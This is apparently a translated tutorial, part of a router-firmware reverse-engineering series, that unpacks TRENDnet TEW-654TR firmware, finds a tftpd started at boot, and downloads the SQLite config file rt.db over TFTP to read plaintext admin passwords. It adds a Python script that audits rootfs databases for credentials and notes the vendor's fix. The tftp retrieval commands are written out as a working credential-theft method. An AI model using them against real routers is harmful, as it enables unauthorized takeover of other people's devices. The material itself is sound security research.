The various tools for unpacking router firmware were described in detail in the previous article. Unpacking yields the files contained in the firmware; the next step is to analyze those files for information leaks. The target of this analysis is a TRENDnet router, and the vulnerability found gives a remote attacker the router's administrative credentials.
Preliminary analysis
The router's login page shows that the model is a TRENDnet TEW-654TR, which helps with information gathering on the target. The vendor's product description lists its main features: three operating modes (router, wireless access point, and wireless access point client), NAT and stateful packet inspection to defend against attacks, and a simple web interface that supports remote management. The latest firmware at the time of writing is v1.10b26; the version analyzed in this article is V1.10B12, which can be downloaded from here. Tools such as file give no useful information about the image on their own. Running binwalk directly on the .bin file shows that it is a fairly standard Linux-based file system.
Firmware Mod Kit unpacks it automatically without trouble:
Once unpacking succeeds, the first thing to look at is the configuration files and the startup scripts in the /etc directory.
➜ etc git:(master) ls -al
drwxrwxrwx  7 root wheel  238 .
drwxrwxrwx    root wheel  578 ..
-rwxrwxrwx  1 root wheel  110 fstab
-rwxr-xr-x  1 root wheel 3774 icon.ico
-rwxrwxrwx  1 root wheel  109 inittab
drwxrwxrwx  3 root wheel  102 rc.d
lrwxrwxrwx  1 root wheel      resolv.conf -> /var/etc/resolv.conf
No valuable configuration files turned up, but the rc.d directory contains a startup script called rcS.
➜ etc git:(master) cd rc.d
➜ rc.d git:(master) ls -al
total 8
drwxrwxrwx 3 root wheel 102 2010 .
drwxrwxrwx 7 root wheel 238 ..
-rwxrwxrwx 1 root wheel 768 2010 rcS
rcS normally initializes services and the environment at boot, so it is worth a closer look.
➜ rc.d git:(master) cat rcS
#!/bin/ash
# This script runs when init it run during the boot process.
# Mounts everything in the fstab
mount -a
mount -o remount +w /
# Mount the RAM filesystem to /tmp
mount -t tmpfs tmpfs /tmp
# copy all files in the mnt folder to the etc folder
cp -a /mnt/* /etc
mkdir -p /var/etc
mkdir -p /var/firm
mkdir -p /var/log
mkdir -p /var/misc
mkdir -p /var/run
mkdir -p /var/sbin
mkdir -p /var/tmp
mkdir -p /tmp/var
cp -f /etc/udhcpd.conf /var/etc/
cp -f /etc/udhcpd.leases /var/misc/
#Add link for resolv.conf
#ln -sf /var/etc/resolv.conf /etc/resolv.conf
# Load configure file from Flash
/bin/echo "Init System ... "
system_manager
# start tftpd
/bin/echo "Start tftpd ... "
tftpd &
#insert cc_dev module for reset packet counter
insmod /lib/modules/cc_dev.ko
The script is simple: it creates a few directories, launches system_manager and tftpd, and finally loads a kernel module. Let's look at tftpd first.
/opt/firmware-mod-kit/trunk/fmk/rootfs$ find . -name tftpd
./sbin/tftpd
/opt/firmware-mod-kit/trunk/fmk/rootfs$ file ./sbin/tftpd
./sbin/tftpd: ELF ... version 1 (SYSV), dynamically linked (uses shared libs), stripped
/opt/firmware-mod-kit/trunk/fmk/rootfs$ strings ./sbin/tftpd
/lib/ld-uClibc.so.0
_init
_fini
__uClibc_main
...
Judging from the function names and strings, this looks like a TFTP server that can be connected to directly. Let's try connecting to it.
~$ tftp 1.1.1.102
tftp> get /var/etc/udhcpd.conf
Received 615 bytes in 0.0 seconds
tftp> quit
~$ cat udhcpd.conf
# Sample udhcpd configuration file (/etc/udhcpd.conf)
# The location of the leases file
lease_file /var/misc/udhcpd.leases
# The location of the pid file
pidfile /var/run/udhcpd.pid
# Everytime udhcpd writes a leases file, the below script would be called.
# Useful for writing the lease file to flash every few hours.
notify_file dumpleases # <--- useful for debugging
# The following settings is added by system_manager
interface br0
opt router 192.168.10.1
option subnet 255.255.255.0
option domain
start 192.168.10.101
end 192.168.10.199
option lease 604800
static_lease xx:xx:d1:b6:xx:xx 192.168.10.1
Finding sensitive information
So a TFTP service is running and accepts connections directly. The next step is to work out where sensitive information is stored. The comment in the rcS file tells us that the system_manager program loads the configuration file from flash. If system_manager writes that configuration file to a temporary directory or a RAM disk, we can download it directly over TFTP. Let's look for the file paths used by system_manager:
/opt/firmware-mod-kit/trunk/fmk/rootfs$ strings ./usr/bin/system_manager | grep '/'
/lib/ld-uClibc.so.0
/etc/rt.db
/etc/default_ap.db
/etc/ap.db
/etc/default_apc.db
/etc/apc.db
ln -sf /var/etc/resolv.conf /etc/resolv.conf
/etc/scripts/config-vlan.sh
Several files with a .db suffix caught my attention, each of which has a counterpart with the prefix default_. Almost every router can restore its default configuration, so a default configuration must be stored somewhere, and if these .db files are the router's configuration files, things get interesting. But which one stores sensitive information such as passwords? You could of course download all three and look. Recalling the product information from earlier: this router supports three modes, router, access point and access point client, and the three databases here look exactly like the configuration for those three modes. Since the target we are testing has remote web management enabled, it should be in router mode, so download rt.db first.
~$ tftp 1.1.1.102
tftp> get /etc/rt.db
Received 49152 bytes in 0.1 seconds
tftp> quit
~$ file rt.db
rt.db: SQLite 3.x database
It is a SQLite database. Let's look at the data inside.
~$ sqlite3 rt.db
SQLite version 3.6.22
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .tables
advanced_network     restore_default      wan_static
daylight_saving      smtp_settings        website_filter
db_version           special_application  website_filter_mode
dhcp_server          static_routing       wireless_advanced
dmz                  syslog               wireless_basic
dynamic_dns          time                 wireless_filter
dynamic_routing      user                 wireless_filter_mode
ip_filter            virtual_server       wireless_security
lan_settings         wan_dhcp             wireless_wps
log_setting          wan_l2tp             wizard_setting
message              wan_pppoe            wpa_settings
nat_filter           wan_pptp             remote_management
wan_settings
sqlite> .schema user
CREATE TABLE "user" ("user_name" VARCHAR DEFAULT '', "user_pwd" VARCHAR DEFAULT '', "level" CHAR DEFAULT '');
sqlite> select * from user;
admin|asecretpassword|1
user|asecretpassword|0
sqlite>
The login password can be read straight out of the table, in plaintext. Logging in with the password from the database succeeded.
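As an added example (not part of the original article, and not code from TRENDnet), the following Python script automates the check this analysis performed by hand: it walks an unpacked rootfs, identifies SQLite files by their 16-byte header rather than by extension, and reports every column whose name suggests a credential, flagging whether the stored value looks hashed or is plaintext. The sample rootfs it builds, an /etc/rt.db with the user table from the listing above, is constructed here for the demonstration; the column-name and hash-format heuristics are assumptions of this example.

```python
import os
import re
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every SQLite 3 file, whatever its extension
SENSITIVE_COL = re.compile(r"pwd|pass|secret|psk|key", re.IGNORECASE)  # assumed credential column names
# Already-hashed heuristic (assumption): crypt(3)-style "$id$..." or a bare MD5 / SHA-1 / SHA-256 hex digest
HASHED_VALUE = re.compile(r"^(\$[0-9a-z]+\$.+|[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.IGNORECASE)

def find_sqlite_files(rootfs):
    """Yield every regular file under rootfs whose header identifies it as SQLite."""
    for dirpath, _, names in os.walk(rootfs):
        for path in (os.path.join(dirpath, n) for n in names):
            if os.path.isfile(path):  # skips broken symlinks and device nodes in an unpacked rootfs
                with open(path, "rb") as fh:
                    if fh.read(16) == SQLITE_MAGIC:
                        yield path

def audit_db(path):
    """Return (table, column, value, looks_hashed) for each row of each credential-like column."""
    findings, con = [], sqlite3.connect(path)
    try:
        for (table,) in list(con.execute("SELECT name FROM sqlite_master WHERE type='table'")):
            for row in list(con.execute(f"PRAGMA table_info('{table}')")):
                col = row[1]  # table_info rows are (cid, name, type, notnull, dflt_value, pk)
                if SENSITIVE_COL.search(col):
                    for (value,) in con.execute(f'SELECT "{col}" FROM "{table}"'):
                        hashed = bool(value) and bool(HASHED_VALUE.match(str(value)))
                        findings.append((table, col, value, hashed))
    finally:
        con.close()
    return findings

def build_sample_rootfs():
    """Constructed sample rootfs: /etc/rt.db with the user table as seen on the TEW-654TR."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "etc"))
    con = sqlite3.connect(os.path.join(root, "etc", "rt.db"))
    con.execute("CREATE TABLE user (user_name VARCHAR DEFAULT '', "
                "user_pwd VARCHAR DEFAULT '', level CHAR DEFAULT '')")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)",
                    [("admin", "asecretpassword", "1"), ("user", "asecretpassword", "0")])
    con.commit(); con.close()
    return root

if __name__ == "__main__":
    for path in find_sqlite_files(build_sample_rootfs()):
        for table, col, value, hashed in audit_db(path):
            print(f"{path}: {table}.{col} = {value!r} ({'hashed' if hashed else 'PLAINTEXT'})")
```

Point it at the rootfs directory produced by Firmware Mod Kit instead of the constructed sample to audit a real image; any PLAINTEXT finding in a file that a boot-time service such as tftpd can serve is exactly the leak described here.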
With some simple analysis we have found a remotely exploitable vulnerability. Welcome to the world of embedded security ~ Admittedly this hole looks a bit lame; the next article will continue with some more interesting ones.
In the latest firmware version, the manufacturer fixed the problem simply by disabling the TFTP service that was started at boot:
# Load configure file from Flash
/bin/echo "Init System ... "
system_manager &
# start tftpd
#/bin/echo "Start tftpd ... "
#tftpd &
#insert cc_dev module for reset packet counter
insmod /lib/modules/cc_dev.ko
Reverse engineering router firmware, Part 2: sensitive information leakage